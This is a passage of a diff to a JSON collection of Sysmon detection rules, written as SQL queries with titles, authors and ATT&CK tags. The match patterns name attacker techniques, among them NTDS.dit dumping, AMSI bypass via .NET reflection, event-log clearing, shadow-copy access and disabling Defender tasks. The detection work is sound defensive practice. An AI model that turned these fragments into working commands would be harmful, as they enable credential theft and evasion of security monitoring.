'% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND (CommandLine LIKE '%psexec%' ESCAPE '\\' OR CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\NTDSDump.exe' ESCAPE '\\' OR Image LIKE '%\\\\NTDSDumpEx.exe' ESCAPE '\\') OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND CommandLine LIKE '%system.hiv%' ESCAPE '\\') OR CommandLine LIKE '%NTDSgrab.ps1%' ESCAPE '\\') OR (CommandLine LIKE '%ac i ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%/c copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\') OR (CommandLine LIKE '%activate instance ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%ntds.dit%' ESCAPE '\\')) OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND ((ParentImage LIKE '%\\\\apache%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\apache%' ESCAPE '\\' OR Image LIKE '%\\\\tomcat%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml" + "filename": "proc_creation_win_susp_ntds.yml" }, { - "title": "WMI Backdoor Exchange Transport Agent", - "id": "797011dc-44f4-4e6f-9f10-a8ceefbe566b", - "status": "test", - "description": "Detects a WMI backdoor in Exchange Transport Agents via WMI event filters", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.persistence", - "attack.t1546.003" - ], + "title": "Suspicious PowerShell Child Processes", + "id": "e4b6d2a7-d8a4-4f19-acbd-943c16d90647", + "status": "experimental", + "description": "Detects suspicious child processes spawned by PowerShell", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\EdgeTransport.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\Bin\\\\OleConverter.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND (Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmi_backdoor_exchange_transport_agent.yml" + "filename": "proc_creation_win_powershell_susp_child_processes.yml" }, { - "title": "Audit Policy Tampering Via NT Resource Kit Auditpol", - "id": "c6c56ada-612b-42d1-9a29-adad3c5c2c1e", - "status": "test", - "description": "Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - SysmonEOP Execution", + "id": "8a7e90c5-fe6e-45dc-889e-057fe4378bd9", + "status": "experimental", + "description": "Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "cve.2022.41120", + "attack.t1068", + "attack.privilege_escalation" ], "falsepositives": [ - "The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. The FP rate should be very low except for tools that use a similar flag structure" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%/logon:none%' ESCAPE '\\' OR CommandLine LIKE '%/system:none%' ESCAPE '\\' OR CommandLine LIKE '%/sam:none%' ESCAPE '\\' OR CommandLine LIKE '%/privilege:none%' ESCAPE '\\' OR CommandLine LIKE '%/object:none%' ESCAPE '\\' OR CommandLine LIKE '%/process:none%' ESCAPE '\\' OR CommandLine LIKE '%/policy:none%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SysmonEOP.exe' ESCAPE '\\' OR Hashes IN ('IMPHASH=22F4089EB8ABA31E1BB162C6D9BF72E5', 'IMPHASH=5123FA4C4384D431CD0D893EEB49BBEC') OR Imphash IN ('22f4089eb8aba31e1bb162c6d9bf72e5', '5123fa4c4384d431cd0d893eeb49bbec')))" ], - "filename": "proc_creation_win_auditpol_nt_resource_kit_usage.yml" + "filename": "proc_creation_win_hktl_sysmoneop.yml" }, { - "title": "Suspicious Service Binary Directory", - "id": "883faa95-175a-4e22-8181-e5761aeb373c", - "status": "test", - "description": "Detects a service binary running in a suspicious directory", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Dtrack RAT Activity", + "id": "f1531fa4-5b84-4342-8f68-9cf3fdbd83d4", + "status": "stable", + "description": "Detects potential Dtrack RAT activity via specific process patterns", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\$Recycle.bin%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') AND (ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%ping -n %' ESCAPE '\\' AND CommandLine LIKE '% echo EEEE > %' ESCAPE '\\') OR (CommandLine LIKE '%ipconfig /all%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\res.ip%' ESCAPE '\\') OR (CommandLine LIKE '%interface ip show config%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\netsh.res%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_service_dir.yml" + "filename": "proc_creation_win_malware_dtrack.yml" }, { - "title": "Suspicious Processes Spawned by WinRM", - "id": "5cc2cda8-f261-4d88-a2de-e9e193c86716", + "title": "Copy From VolumeShadowCopy Via Cmd.EXE", + "id": "c73124a7-3e89-44a3-bdc1-25fe4df754b1", "status": "experimental", - "description": "Detects suspicious processes including shells spawnd from WinRM host process", - "author": "Andreas Hunkeler (@Karneades), Markus Neis", + "description": "Detects the execution of the builtin \"copy\" command that targets a shadow copy (sometimes used to copy registry hives that are in use)", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.t1190", - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Legitimate WinRM usage" + "Backup scenarios using the commandline" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\')" ], - "filename": "proc_creation_win_winrm_susp_child_process.yml" + "filename": "proc_creation_win_cmd_shadowcopy_access.yml" }, { - "title": "Potential Crypto Mining Activity", - "id": "66c3b204-9f88-4d0a-a7f7-8a57d521ca55", - "status": "stable", - "description": "Detects command line parameters or strings often used by crypto miners", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Schtasks Execution AppData Folder", + "id": "c5c00f49-b3f9-45a6-997e-cfdecc6e1967", + "status": "experimental", + "description": "Detects the creation of a schtask that executes a file from C:\\Users\\\\AppData\\Local", + "author": "pH-T (Nextron Systems), Nasreddine Bencherchali", "tags": [ - "attack.impact", - "attack.t1496" + "attack.execution", + "attack.persistence", + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use of crypto miners", - "Some build frameworks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% --cpu-priority=%' ESCAPE '\\' OR CommandLine LIKE '%--donate-level=0%' ESCAPE '\\' OR CommandLine LIKE '% -o pool.%' ESCAPE '\\' OR CommandLine LIKE '% --nicehash%' ESCAPE '\\' OR CommandLine LIKE '% --algo=rx/0 %' ESCAPE '\\' OR CommandLine LIKE '%stratum+tcp://%' ESCAPE '\\' OR CommandLine LIKE '%stratum+udp://%' ESCAPE '\\' OR CommandLine LIKE '%LS1kb25hdGUtbGV2ZWw9%' ESCAPE '\\' OR CommandLine LIKE '%0tZG9uYXRlLWxldmVsP%' ESCAPE '\\' OR CommandLine LIKE '%tLWRvbmF0ZS1sZXZlbD%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt0Y3A6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdGNwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3RjcDovL%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt1ZHA6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdWRwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3VkcDovL%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% pool.c %' ESCAPE '\\' OR CommandLine LIKE '% pool.o %' ESCAPE '\\' OR CommandLine LIKE '%gcc -%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/TR%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_crypto_mining_monero.yml" + "filename": "proc_creation_win_schtasks_appdata_local_system.yml" }, { - "title": "Potential CommandLine Path Traversal Via Cmd.EXE", - "id": "087790e3-3287-436c-bccf-cbd0184a7db1", + "title": "Suspicious WmiPrvSE Child Process", + "id": "8a582fe2-0882-4b89-a82a-da6b2dc32937", "status": "test", - "description": "Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking", - "author": "xknow @xknow_infosec, Tim Shelton", + "description": "Detects suspicious and uncommon child processes of WmiPrvSE", + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng, Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.003" + "attack.defense_evasion", + "attack.t1047", + "attack.t1204.002", + "attack.t1218.010" ], "falsepositives": [ - "Java tools are known to produce false-positive when loading libraries" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'cmd.exe') AND ((ParentCommandLine LIKE '%/c%' ESCAPE '\\' OR ParentCommandLine LIKE '%/k%' ESCAPE '\\' OR ParentCommandLine LIKE '%/r%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/k%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (ParentCommandLine = '/../../' OR CommandLine LIKE '%/../../%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\Tasktop\\\\keycloak\\\\bin\\\\/../../jre\\\\bin\\\\java%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\')))) AND NOT ((Image LIKE '%\\\\WerFault.exe' ESCAPE '\\') OR (Image LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_path_traversal.yml" + "filename": "proc_creation_win_wmiprvse_susp_child_processes.yml" }, { - "title": "Ping Hex IP", - "id": "1a0d4aba-7668-4365-9ce4-6d79ab088dfd", - "status": "test", - "description": "Detects a ping command that uses a hex encoded IP address", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Elevated System Shell", + "id": "178e615d-e666-498b-9630-9ed363038101", + "status": "experimental", + "description": "Detects when a shell program such as the windows Command Prompt or PowerShell is launched with system privileges.", + "author": "frack113, Tim Shelton (update fp)", "tags": [ + "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1140", - "attack.t1027" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unlikely, because no sane admin pings IP addresses in a hexadecimal form" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ping.exe' ESCAPE '\\' AND CommandLine LIKE '%0x%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe')) AND ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND LogonId = '0x3e7')) AND NOT (((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\ManageEngine\\\\ADManager Plus\\\\pgsql\\\\bin\\\\postgres.exe' ESCAPE '\\' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\cmd.exe /c \"%' ESCAPE '\\' AND CurrentDirectory LIKE '%C:\\\\WINDOWS\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp%' ESCAPE '\\' AND ParentImage LIKE '%\\\\invcol.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\ProgramData\\\\Dell\\\\UpdateService\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\CompatTelRunner.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\CompatTelRunner.exe -m:appraiser.dll -f:DoScheduledTelemetryRun%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\IBM\\\\SpectrumProtect\\\\webserver\\\\scripts\\\\%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\IBM\\\\SpectrumProtect\\\\webserver\\\\scripts\\\\%' ESCAPE '\\') OR (CommandLine = 'powershell.exe -ExecutionPolicy Restricted -Command Write-Host ''Final result: 1'';') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/d /c C:\\\\Windows\\\\system32\\\\silcollector.cmd%' ESCAPE '\\') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%cmd.exe /c btool server list replication\\_port --no-log' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c btool server list general --no-log' ESCAPE '\\')) OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Windows\\\\system32\\\\reg.exe query hklm\\\\software\\\\microsoft\\\\windows\\\\softwareinventorylogging /v collectionstate /reg:64%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /c PAUSE' ESCAPE '\\')))" ], - "filename": "proc_creation_win_ping_hex_ip.yml" + "filename": "proc_creation_win_susp_elevated_system_shell.yml" }, { - "title": "Potential ACTINIUM Persistence Activity", - "id": "e1118a8f-82f5-44b3-bb6b-8a284e5df602", - "status": "test", - "description": "Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.", - "author": "Andreas Hunkeler (@Karneades)", + "title": "Potential Persistence Via Powershell Search Order Hijacking - Task", + "id": "b66474aa-bd92-4333-a16c-298155b120df", + "status": "experimental", + "description": "Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell \"Get-Variable\" technique as seen being used in Colibri Loader", + "author": "pH-T (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ + "attack.execution", "attack.persistence", - "attack.t1053", - "attack.t1053.005" + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%wscript%' ESCAPE '\\' AND CommandLine LIKE '% /e:vbscript%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k netsvcs%' ESCAPE '\\' AND ParentCommandLine LIKE '%-s Schedule%' ESCAPE '\\' AND (CommandLine LIKE '% -windowstyle hidden' ESCAPE '\\' OR CommandLine LIKE '% -w hidden' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass' ESCAPE '\\' OR CommandLine LIKE '% -noni' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_actinium_persistence.yml" + "filename": "proc_creation_win_schtasks_powershell_persistence.yml" }, { - "title": "Suspicious Eventlog Clear or Configuration Change", - "id": "cc36992a-4671-4f21-a91d-6c2b72a2edf5", - "status": "stable", - "description": "Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others).", - "author": "Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105", + "title": "Disable Important Scheduled Task", + "id": "9ac94dc8-9042-493c-ba45-3b5e7c86b980", + "status": "experimental", + "description": "Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "attack.t1562.002", - "car.2016-04-002" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment", - "Maintenance activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' AND (CommandLine LIKE '%clear-log %' ESCAPE '\\' OR CommandLine LIKE '% cl %' ESCAPE '\\' OR CommandLine LIKE '%set-log %' ESCAPE '\\' OR CommandLine LIKE '% sl %' ESCAPE '\\' OR CommandLine LIKE '%lfn:%' ESCAPE '\\')) OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%Clear-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Remove-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Limit-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Clear-WinEvent %' ESCAPE '\\')) OR (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '% ClearEventLog %' ESCAPE '\\')) AND NOT (((ParentImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND CommandLine LIKE '% sl %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/disable%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_eventlog_clear.yml" + "filename": "proc_creation_win_schtasks_disable.yml" }, { - "title": "Potential AMSI Bypass Via .NET Reflection", - "id": "30edb182-aa75-42c0-b0a9-e998bb29067c", + "title": "Explorer NOUACCHECK Flag", + "id": "534f2ef7-e8a2-4433-816d-c91bccde289b", "status": "test", - "description": "Detects Request to \"amsiInitFailed\" that can be used to disable AMSI Scanning", - "author": "Markus Neis, @Kostastsale", + "description": "Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Domain Controller User Logon", + "Unknown how many legitimate software products use that method" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%System.Management.Automation.AmsiUtils%' ESCAPE '\\' OR CommandLine LIKE '%amsiInitFailed%' ESCAPE '\\') OR (CommandLine LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND CommandLine LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND CommandLine LIKE '%NonPublic,Static%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' AND CommandLine 